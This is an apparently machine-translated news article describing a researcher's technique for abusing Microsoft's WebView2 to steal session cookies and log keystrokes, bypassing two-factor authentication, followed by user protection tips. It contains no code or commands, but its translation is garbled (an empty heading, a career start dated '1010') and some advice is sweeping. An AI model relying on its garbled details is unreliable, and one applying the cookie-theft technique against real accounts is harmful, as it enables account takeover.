Microsoft, of all people, enables phishers to trick secure two-factor authentication (2FA) using the WebView2 module.
Anonymous security researcher mr.d0x explains how in his recently published article you can use the WebView2 element to trick two-factor authentication (2FA). For more convenience, the websites store the cookies in the browser after a successful 2FA login. The WebView2 bug allows third parties to access these cookies to gain full account access themselves. The application is in the Microsoft Edge browser.
In this case, of course, the 2FA check using an app or short message would be omitted. Some but not all providers also check the browser used. If this deviates from the previously used browsers, you must also confirm your identity with the link in an e-mail sent for this purpose. Then the phishers would have more problems taking over the accounts.
What is WebView2?
It’s not that easy after all
Then it’s quite simple for the hackers to log keystrokes and the cookies instead of the user sent to servers on the Internet. The side then thinks the user on the other end is already authenticated. Microsoft has already reacted to the WebView2 bug. This is a social engineering attack and therefore not so wild because the user has to run a malicious file beforehand. That’s true. But this is certainly not an insurmountable obstacle for cybercriminals.
How to protect yourself from the WebView2 bug?
- That sounds trivial but it’s true: Please don’t use Windows! The vulnerability simply doesn’t exist anywhere else!
- never open any executable files that you have received via messenger, e-mail etc.
- Be careful when starting other media. Don’t forget: PDF documents, videos etc. can sometimes contain malware
- never open links that are unknown to you. Especially not if you don’t know the sender!
- Windows users please keep antivirus software up to date
- download new programs only from trusted sources
The disadvantage for phishers is that the victim must have executed a malicious file as a prerequisite. Fortunately, it is not that easy to outwit the 2FA method.
Cyber criminals can, by the way, extend the functionality of the existing WebView2 application. This would, for example, even enable remote access to third-party computers. In the method presented by mr.d0x, the binary uses only the legitimate functions provided by Microsoft. This probably makes it harder to be detected as an intruder by antivirus programs.
If you are interested in further details: You can read the full step-by-step instructions from the security researcher here. An introduction to the Microsoft Edge WebView2 software is available there.
Lars Sobiraj started in 1010 as a career changer for various computer magazines to be. 2000 numerous other online magazines were added in addition to gulli.com. He is the founder of Tarnkappe.info. In addition, Ghandy, as he calls himself in the scene, since 2014 at various universities and training institutions attendees on how the Internet works.